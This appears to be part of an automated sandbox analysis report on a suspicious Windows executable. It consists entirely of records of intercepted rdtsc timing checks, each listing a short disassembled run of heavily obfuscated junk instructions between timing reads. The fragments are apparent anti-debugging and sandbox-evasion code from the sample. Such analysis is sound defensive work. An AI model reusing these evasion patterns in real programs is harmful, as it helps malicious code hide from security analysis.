                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 538064F second address: 5380667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov bh, 85h 0x0000000d mov di, ax 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380667 second address: 538066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 538066B second address: 538066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 538066F second address: 5380675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380675 second address: 538067B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53802FC second address: 5380330 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0DD08F41C2h 0x00000008 xor eax, 2B042F18h 0x0000000e jmp 00007F0DD08F41BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bx, ax 0x0000001e mov edx, esi 0x00000020 popad 0x00000021 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380330 second address: 5380391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c mov bx, BB66h 0x00000010 pop ebx 0x00000011 mov edi, eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, CA16h 0x0000001d pushfd 0x0000001e jmp 00007F0DD1497E77h 0x00000023 sbb ch, FFFFFF9Eh 0x00000026 jmp 00007F0DD1497E79h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380391 second address: 53803BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0DD08F41C7h 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dh, ch 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53803BB second address: 53803C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53803C1 second address: 53803C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53900F0 second address: 53900F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53900F6 second address: 5390145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F0DD08F41C4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F0DD08F41C0h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov edi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0DD08F41C8h 0x00000022 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0ED8 second address: 53C0EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0EDE second address: 53C0EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0EE2 second address: 53C0F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0DD1497E6Ah 0x00000010 or cx, 9EA8h 0x00000015 jmp 00007F0DD1497E6Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c mov ecx, edx 0x0000001e pop edx 0x0000001f popad 0x00000020 mov dword ptr [esp], ebp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F0DD1497E6Ah 0x0000002c adc ax, 9108h 0x00000031 jmp 00007F0DD1497E6Bh 0x00000036 popfd 0x00000037 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53A0564 second address: 53A05C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0DD08F41C1h 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F0DD08F41C6h 0x00000016 adc eax, 2A5FFB28h 0x0000001c jmp 00007F0DD08F41BBh 0x00000021 popfd 0x00000022 push eax 0x00000023 jmp 00007F0DD08F41BFh 0x00000028 pop esi 0x00000029 popad 0x0000002a mov dword ptr [esp], ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53A05C4 second address: 53A05CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53804DD second address: 5380501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DD08F41C0h 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380501 second address: 5380510 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380510 second address: 5380557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0DD08F41BEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0DD08F41C7h 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380557 second address: 538055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53A0022 second address: 53A004C instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0DD08F41C9h 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53A0305 second address: 53A0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DD1497E6Ch 0x00000009 popad 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53A0316 second address: 53A033D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DD08F41C5h 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53A033D second address: 53A039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0DD1497E6Ah 0x00000013 adc cl, FFFFFFE8h 0x00000016 jmp 00007F0DD1497E6Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F0DD1497E78h 0x00000022 and si, FC48h 0x00000027 jmp 00007F0DD1497E6Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53A039B second address: 53A03E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, AFh 0x0000000f pushfd 0x00000010 jmp 00007F0DD08F41C4h 0x00000015 sbb esi, 3DA33108h 0x0000001b jmp 00007F0DD08F41BBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C06E4 second address: 53C06F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD1497E6Ch 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C06F4 second address: 53C071A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F0DD08F41BCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0DD08F41BAh 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C071A second address: 53C0720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0720 second address: 53C0742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DD08F41BAh 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0742 second address: 53C0748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0748 second address: 53C0759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41BDh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0759 second address: 53C0878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov si, 2AC3h 0x00000011 pushfd 0x00000012 jmp 00007F0DD1497E78h 0x00000017 adc eax, 3B3FF588h 0x0000001d jmp 00007F0DD1497E6Bh 0x00000022 popfd 0x00000023 popad 0x00000024 push eax 0x00000025 jmp 00007F0DD1497E79h 0x0000002a xchg eax, ecx 0x0000002b jmp 00007F0DD1497E6Eh 0x00000030 mov eax, dword ptr [76FB65FCh] 0x00000035 pushad 0x00000036 mov si, FBADh 0x0000003a push ecx 0x0000003b pushfd 0x0000003c jmp 00007F0DD1497E79h 0x00000041 adc ecx, 65CAF4B6h 0x00000047 jmp 00007F0DD1497E71h 0x0000004c popfd 0x0000004d pop esi 0x0000004e popad 0x0000004f test eax, eax 0x00000051 jmp 00007F0DD1497E77h 0x00000056 je 00007F0E4300AFA9h 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f pushfd 0x00000060 jmp 00007F0DD1497E6Bh 0x00000065 sub al, FFFFFF9Eh 0x00000068 jmp 00007F0DD1497E79h 0x0000006d popfd 0x0000006e pushfd 0x0000006f jmp 00007F0DD1497E70h 0x00000074 and si, D498h 0x00000079 jmp 00007F0DD1497E6Bh 0x0000007e popfd 0x0000007f popad 0x00000080 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0878 second address: 53C0890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41C4h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0890 second address: 53C08C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b mov dx, 3510h 0x0000000f mov dx, 923Ch 0x00000013 popad 0x00000014 xor eax, dword ptr [ebp+08h] 0x00000017 jmp 00007F0DD1497E70h 0x0000001c and ecx, 1Fh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push ebx 0x00000023 pop esi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C08C1 second address: 53C08C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C08C6 second address: 53C08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD1497E6Bh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C08D5 second address: 53C0921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ror eax, cl 0x0000000a jmp 00007F0DD08F41C5h 0x0000000f leave 0x00000010 jmp 00007F0DD08F41BEh 0x00000015 retn 0004h 0x00000018 nop 0x00000019 mov esi, eax 0x0000001b lea eax, dword ptr [ebp-08h] 0x0000001e xor esi, dword ptr [00AD2014h] 0x00000024 push eax 0x00000025 push eax 0x00000026 push eax 0x00000027 lea eax, dword ptr [ebp-10h] 0x0000002a push eax 0x0000002b call 00007F0DD5224ACCh 0x00000030 push FFFFFFFEh 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0DD08F41C7h 0x00000039 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0921 second address: 53C0991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d call 00007F0DD1497E79h 0x00000012 pop eax 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007F0DD1497E6Ch 0x0000001a add si, F208h 0x0000001f jmp 00007F0DD1497E6Bh 0x00000024 popfd 0x00000025 popad 0x00000026 ret 0x00000027 nop 0x00000028 push eax 0x00000029 call 00007F0DD5DC87D8h 0x0000002e mov edi, edi 0x00000030 pushad 0x00000031 mov eax, 12CAA59Bh 0x00000036 mov di, ax 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b jmp 00007F0DD1497E6Ah 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F0DD1497E6Eh 0x00000048 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C0991 second address: 53C09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 65h 0x00000005 mov cx, D829h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0DD08F41BEh 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C09B0 second address: 53C09B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C09B6 second address: 53C09E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0DD08F41C7h 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53C09E3 second address: 53C09E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370051 second address: 5370057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370057 second address: 537005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 537005B second address: 5370084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DD08F41C5h 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370084 second address: 53700EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f pushfd 0x00000010 jmp 00007F0DD1497E6Ch 0x00000015 adc cx, FC78h 0x0000001a jmp 00007F0DD1497E6Bh 0x0000001f popfd 0x00000020 popad 0x00000021 and esp, FFFFFFF8h 0x00000024 jmp 00007F0DD1497E76h 0x00000029 xchg eax, ecx 0x0000002a jmp 00007F0DD1497E70h 0x0000002f push eax 0x00000030 pushad 0x00000031 push edx 0x00000032 pop edx 0x00000033 mov dx, si 0x00000036 popad 0x00000037 xchg eax, ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53700EB second address: 53700EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53700EF second address: 5370106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53607C9 second address: 53607EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov bx, EBD6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DD08F41C3h 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53607EB second address: 5360829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 146Ah 0x00000007 call 00007F0DD1497E6Bh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov edx, 442E1128h 0x00000017 jmp 00007F0DD1497E71h 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f mov edx, 1479AA6Eh 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360829 second address: 536082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 536082D second address: 5360833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360833 second address: 5360865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov ecx, 133DDF3Dh 0x00000010 mov esi, 40AE3239h 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360865 second address: 5360869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360869 second address: 536086D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 536086D second address: 5360873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360873 second address: 5360889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, C965h 0x00000007 push eax 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub ebx, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360889 second address: 536088E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 536088E second address: 53608AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DD08F41BEh 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53608AA second address: 53608B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53608B9 second address: 53608D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov si, 9E87h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F0E424B9C7Eh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 movzx eax, dx 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53608D2 second address: 53608F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 66AD0FE4h 0x0000000b popad 0x0000000c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ecx, 7D9BB28Bh 0x0000001b mov dh, al 0x0000001d popad 0x0000001e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53608F0 second address: 5360935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c push eax 0x0000000d pushfd 0x0000000e jmp 00007F0DD08F41BDh 0x00000013 jmp 00007F0DD08F41BBh 0x00000018 popfd 0x00000019 pop eax 0x0000001a popad 0x0000001b je 00007F0E424B9C3Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0DD08F41BDh 0x0000002a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360935 second address: 536094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 536094A second address: 53609D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 162BC922h 0x00000008 pushfd 0x00000009 jmp 00007F0DD08F41C3h 0x0000000e sbb cx, F61Eh 0x00000013 jmp 00007F0DD08F41C9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test byte ptr [76FB6968h], 00000002h 0x00000023 jmp 00007F0DD08F41BEh 0x00000028 jne 00007F0E424B9BCFh 0x0000002e jmp 00007F0DD08F41C0h 0x00000033 mov edx, dword ptr [ebp+0Ch] 0x00000036 jmp 00007F0DD08F41C0h 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F0DD08F41BAh 0x00000045 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53609D5 second address: 53609E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
